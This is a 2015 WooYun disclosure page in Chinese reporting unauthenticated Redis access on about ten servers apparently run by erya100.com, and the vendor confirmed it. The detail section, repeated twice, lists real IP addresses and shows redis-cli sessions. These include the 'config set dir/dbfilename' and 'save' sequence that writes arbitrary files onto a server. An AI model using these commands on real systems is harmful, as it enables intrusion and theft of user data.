当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110481

漏洞标题:尔雅近10个服务器redis未授权访问,泄漏几百万数据信息

相关厂商:erya100.com

漏洞作者: 好基友一辈子

提交时间:2015-05-06 16:48

修复时间:2015-06-20 20:58

公开时间:2015-06-20 20:58

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-06: 厂商已经确认,细节仅向厂商公开
2015-05-16: 细节向核心白帽子及相关领域专家公开
2015-05-26: 细节向普通白帽子公开
2015-06-05: 细节向实习白帽子公开
2015-06-20: 细节向公众公开

简要描述:

详细说明:

QQ图片20150426144335.png


先来看第一个。问过工作人员,应该是尔雅旗下的服务器
ip:122.112.16.13存在redis未授权访问。因为没有网站所以没getshell

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.13
redis 122.112.16.13:6379> config set dir /var
OK
redis 122.112.16.13:6379> config set dbfilename test.txt
OK
redis 122.112.16.13:6379> set fuck wooyun
OK
redis 122.112.16.13:6379> save
OK
(10.91s)
redis 122.112.16.13:6379>


可以看到正常执行命令并导出了文件。。
同样,对尔雅所在服务器网段进行扫描,发现近10台存在同样的问题。。
这里一起打包提交

122.112.16.13
122.112.16.14
122.112.16.144
122.112.16.239
218.246.22.189
118.26.230.55
118.26.230.198
118.26.230.241
118.26.230.254


全部存在未授权访问

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.14
redis 122.112.16.14:6379>
redis 122.112.16.14:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.144
redis 122.112.16.144:6379>
redis 122.112.16.144:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.239
redis 122.112.16.239:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 218.246.22.189
redis 218.246.22.189:6379>
redis 218.246.22.189:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.55
redis 118.26.230.55:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.198
redis 118.26.230.198:6379>
redis 118.26.230.198:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.241
redis 118.26.230.241:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.254
redis 118.26.230.254:6379>


全部连接成功
其中118.26.230.198泄漏数据超过387w

1.png

漏洞证明:

QQ图片20150426144335.png


先来看第一个。问过工作人员,应该是尔雅旗下的服务器
ip:122.112.16.13存在redis未授权访问。因为没有网站所以没getshell

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.13
redis 122.112.16.13:6379> config set dir /var
OK
redis 122.112.16.13:6379> config set dbfilename test.txt
OK
redis 122.112.16.13:6379> set fuck wooyun
OK
redis 122.112.16.13:6379> save
OK
(10.91s)
redis 122.112.16.13:6379>


可以看到正常执行命令并导出了文件。。
同样,对尔雅所在服务器网段进行扫描,发现近10台存在同样的问题。。
这里一起打包提交

122.112.16.13
122.112.16.14
122.112.16.144
122.112.16.239
218.246.22.189
118.26.230.55
118.26.230.198
118.26.230.241
118.26.230.254


全部存在未授权访问

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.14
redis 122.112.16.14:6379>
redis 122.112.16.14:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.144
redis 122.112.16.144:6379>
redis 122.112.16.144:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.239
redis 122.112.16.239:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 218.246.22.189
redis 218.246.22.189:6379>
redis 218.246.22.189:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.55
redis 118.26.230.55:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.198
redis 118.26.230.198:6379>
redis 118.26.230.198:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.241
redis 118.26.230.241:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.254
redis 118.26.230.254:6379>


全部连接成功
其中118.26.230.198泄漏数据超过387w

1.png

修复方案:

版权声明:转载请注明来源 好基友一辈子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-06 20:57

厂商回复:

感谢提出,问题确实存在,正在修复中

最新状态:

暂无